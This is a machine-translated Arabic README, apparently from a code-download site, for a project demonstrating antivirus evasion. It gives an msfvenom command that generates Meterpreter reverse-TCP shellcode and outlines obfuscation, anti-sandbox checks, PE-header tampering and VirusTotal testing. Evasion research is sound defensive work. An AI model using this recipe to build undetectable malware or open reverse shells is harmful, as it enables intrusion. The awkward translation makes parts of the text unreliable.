الصفحة الرئيسية>كود المصدر JSP>فئات أخرى
تنزيل

برامج البرمجيات: تقنيات التهرب من البرامج الضارة المتقدمة

جدول المحتويات

  1. مقدمة
  2. سمات
  3. تثبيت
  4. الاستخدام
  5. منهجية التجربة
  6. الاختبار
  7. المساهمة
  8. رخصة

مقدمة

Invismalware هو مشروع مصمم لإظهار تقنيات التهرب من البرامج الضارة المتقدمة التي تتجاوز اكتشاف مكافحة الفيروسات. تركز تجربة البرامج الضارة التي تعتمد على البحث على استخدام أساليب التشويش ، مثل تعديلات التعليمات البرمجية واستراتيجيات مكافحة Sandbox ، للتهرب من الكشف عن البرامج الضارة الثابتة والديناميكية.

هذا المشروع هو لأغراض تعليمية فقط ، يهدف إلى توفير رؤى حول استراتيجيات الدفاع عن البرامج الضارة الحديثة من خلال التعلم من تقنيات التهرب التي تستخدمها الجهات الفاعلة الضارة.

سمات

  • جيل Shellcode : قم بإنشاء حمولات TCP SHELL عكسية مخصصة باستخدام MSFVENOM.
  • تعديل الكود : تعديل رمز البرامج الضارة للتهرب من اكتشاف مكافحة الفيروسات عن طريق إضافة NOPs ، معالجة رؤوس PE ، وأكثر من ذلك.
  • التحليل المضاد للديناميين : قم بتضمين شيكات للكشف عن بيئات صندوق الرمل مثل برنامج تشغيل الصوت وجهاز USB.
  • معالجة رأس PE : إخفاء البرامج الضارة عن طريق تغيير رأس القابل للتنفيذ (PE) المحمول لتجنب الكشف القائم على التوقيع.
  • حساب معدل التهرب : قياس فعالية تقنيات التهرب من خلال مقارنة النتائج عبر مختلف محركات مكافحة الفيروسات.

تثبيت

للبدء ، استنساخ المستودع وتثبيت التبعيات اللازمة.

المتطلبات الأساسية

  • بيثون 3.x
  • VirtualBox/VMware (للاختبار في البيئات الافتراضية)
  • Framework Metasploit (لإنشاء رمز shellcode)
  • PE-Bear (لمعالجة رأس PE)

استنساخ المستودع 

git clone https://github.com/mawg0ud/InvisMalware.git
cd InvisMalware

تثبيت التبعيات 

pip install -r requirements.txt

الاستخدام

1. إنشاء رمز قذيفة البرامج الضارة

استخدم msfvenom لإنشاء رمز shellcode عكسي TCP: 

msfvenom -p windows/meterpreter/reverse_tcp LHOST= < your_ip > LPORT= < your_port > -f c > evilexp.c

2. قم بتعديل رمز الصدفة

قم بتحرير ملف evilexp.c لإلغاء الرمز وتجنب الكشف.

3. تشغيل في الجهاز الظاهري

نشر البرامج الضارة في جهاز افتراضي آمن ومعزول لاختبار سلوكه وقياس معدلات الكشف.

4. التحميل إلى virustotal

قم بتحميل البرامج الضارة الخاصة بك إلى virustotal لتقييم معدل التهرب عبر محركات مضادة للفيروسات المتعددة.

منهجية التجربة

يتبع المشروع منهجية من أربع مراحل لتحقيق التهرب من البرامج الضارة:

  1. جيل شل الرمز : قم بإنشاء رمز قذيفة عكسي الأساس.
  2. تعديل الكود : تعثر رمز الصدفة للتهرب من الكشف.
  3. التحليل المضاد للديناميين : أضف اكتشاف صندوق الرمل لتجاوز أدوات التحليل الديناميكي.
  4. تعديل رأس PE : قم بتغيير رأس PE لزيادة تعويض توقيع البرامج الضارة.

الاختبار

الاختبار المحلي

قم بتشغيل البرامج الضارة على جهازك الظاهري المجهز ببرامج مكافحة الفيروسات مثل Kaspersky أو ​​Windows Defender أو BitDefender .

اختبار virustotal

قم بتحميل البرامج الضارة المعدلة إلى virustotal وتحقق من عدد محركات مكافحة الفيروسات التي تكتشفها بنجاح.

المساهمة

نرحب بالمساهمات لتحسين المشروع. إذا كنت ترغب في المساهمة:

  1. شوكة المستودع.
  2. قم بإنشاء فرع جديد للميزة الخاصة بك أو إصلاح الأخطاء.
  3. إرسال طلب سحب بمعلومات مفصلة حول التغييرات الخاصة بك.

رخصة

هذا المشروع مرخص بموجب ترخيص معهد ماساتشوستس للتكنولوجيا. انظر ملف الترخيص للحصول على التفاصيل.

يوسع
معلومات إضافية
تطبيقات ذات صلة
نوصي لك
أخبار ذات صلة الكل